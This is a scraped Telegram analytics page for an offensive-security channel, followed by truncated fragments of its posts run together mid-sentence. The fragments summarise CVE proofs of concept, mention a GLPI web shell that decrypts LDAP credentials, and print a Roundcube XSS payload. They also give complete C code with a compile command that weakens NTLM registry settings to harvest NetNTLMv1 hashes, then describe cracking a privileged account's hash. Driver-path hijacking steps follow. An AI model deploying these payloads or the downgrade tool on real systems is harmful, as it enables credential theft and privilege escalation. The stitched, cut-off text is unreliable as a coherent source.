APT
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
Ko'proq ko'rsatish📈 Telegram kanali APT analitikasi
APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 16 273 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 7 794-o'rinni va Rossiya mintaqasida 40 535-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 16 273 obunachiga ega bo‘ldi.
01 Sentabr, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 547 ga, so‘nggi 24 soatda esa 18 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 44.29% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 18.04% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 7 204 marta ko‘riladi; birinchi sutkada odatda 2 934 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 26 ta reaksiya keladi.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel discusses:
— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChat”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 02 Sentabr, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
CCommandBuffer::Initialize method, triggered by a miscalculation during memory allocation.
🖥 Affected versions
— Windows 10: 1507, 1607, 1809, 21H2, 22H2
— Windows 11: 21H2, 22H2, 23H2
— Windows Server: 2016, 2019, 2022
🔗 Source:
https://github.com/fortra/CVE-2024-30051
#windows #eop #dwm #research #pocmonitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.
🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401
#nagios #sql #rce #privesc #poc #exploitComTraveller/PermissionHunter
- ComTraveller - анализ всех COM на системе на предмет наличия TypeLib, значения ключа Runas (The Interactive User или NT AUTHORITY\SYSTEM ведет к LPE), а также возможности кросс-сессионной активации, как было в LeakedWallpaper
Так вы можете несколько автоматизировать процесс обнаружения мисконфигов в COM :)
Помимо того, там есть небольшой трюк по получению PID процесса, в котором инстанцирован COM-класс, что позволяет исследовать COMы с новой стороны
А если бы я релизнул это чуть раньше, то кто-нибудь точно нашел CVE-2024-38100 (FakePotato) и CVE-2024-38061 (SilverPotato) 🤪+ Example of a GLPI web shell for accessing hidden variables and credentials, which can be useful when GLPI is connected to Active Directory via LDAP. This can help gather credentials of privileged users. While GLPI encrypts these credentials in the database, a web shell can access, decrypt, and display them.
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar"> Foo </body>🔗 Source: https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail #roundcube #xss #cve #poc
#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep
void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
RegCloseKey(hKey);
*oldValue = value;
} else {
printf("Ошибка чтения ключа реестра.\n");
}
}
void SetRegKey(const char* path, const char* key, DWORD newValue) {
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
RegCloseKey(hKey);
} else {
printf("Ошибка записи ключа реестра.\n");
}
}
void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}
void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}
int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;
ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);
// Задержка 60 секунд
sleep(60);
NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);
return 0;
}
Компилируем так
x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c
В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users. 1) ISO Mounting and Driver Selection
1.1) The attack begins with mounting the ISO as a filesystem.
1.2) The attacker selects a service driver that can be manipulated, focusing on those that can be started or restarted without immediate detection.
2) Hijacking the Driver Path
2.1) The core of the attack involves hijacking the driver path. The methods used include:
2.2) Direct Reparse Point Abuse
2.3) DosDevice Global Symlink Abuse
2.4) Drive Mountpoint Swap